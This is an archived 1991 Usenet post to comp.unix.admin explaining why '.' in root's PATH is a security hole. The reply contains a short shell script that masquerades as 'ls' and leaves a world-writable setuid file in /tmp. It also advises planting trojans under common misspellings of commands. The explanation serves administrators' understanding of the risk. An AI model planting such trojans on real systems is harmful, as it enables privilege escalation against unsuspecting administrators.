Mysterious security hole

Jon Wright jonw at assip.csasyd.oz
Thu Jun 13 09:56:57 AEST 1991 

In <91161.131540SCHDAVZ at YaleVM.YCC.Yale.Edu> SCHDAVZ at YaleVM.YCC.Yale.Edu (Dave Schweisguth) writes:

>This probably isn't so mysterious, but the subject line has got to be zippy or
>nobody'll read my post.
> 
>The 'login' command initializes PATH with (among other useful directories)
>'.'. 'su' leaves '.' out. A footnote to a Unix book I have here hints at a
>security hole involving the _position_ of '.' in PATH, claiming that having
>'.' first is dangerous. It doesn't say why.
>     These add up to something screwy with '.'. Can someone explain why root/
>Joe User ought/ought not have '.' in his/her path, and if so should it be
>first, last, or anywhere, and (this is the good part) why? The system is an
>SGI Personal Iris, IRIX v3.3.2, if it matters.
>

Simple......
If ROOT has "." in his/her path, I create a file called "ls" in any directory
that is:
	a. I have write permission for
	b. Root may use....
My ls will do the following:
	#!/bin/sh
	WHO=`whoami`
	FILE=/tmp/...gotcha.${WHO}
	echo > ${FILE}
	chmod ugo+rwx ${FILE}
	chmod ug+s ${FILE}
	/bin/ls $*
or something similar (I don't want an arguement about the correctness of this
example - the idea is right).

Now I wait patiently and keep checking /tmp, eventually root will try to run ls
in that directory, and bingo I now have a setuid file thta I can modify.

Obviously I need to pick a command that is not built into the shell and also that
appears in the path later than "."

If "." is at the end, then try common misspellings of commands such as "ls-" and
"act" etc.

> 
>This may well be an FAQ (the book certainly seems to think so) but I haven't
>found an FAQ list. If there is one, please let me know. Thanks!
> _____________________________________________________________________________
>/                                                                             \
>|   Dave Schweisguth               5386 Yale Station           203-436-2694   |
>|   schdavz at yalevm.ycc.yale.edu    New Haven, CT 06502-5386                   |
>\_____________________________________________________________________________/

Hope this helps,


		Regards,
			    Jon Gilbert Wright

	Network Manager				Unix Systems Consultant
	Computer Sciences of Australia		Guru Software Services
	jonw at assip.csasyd.oz			gremlin at runxtsa.runx.oz

More information about the Comp.unix.admin mailing list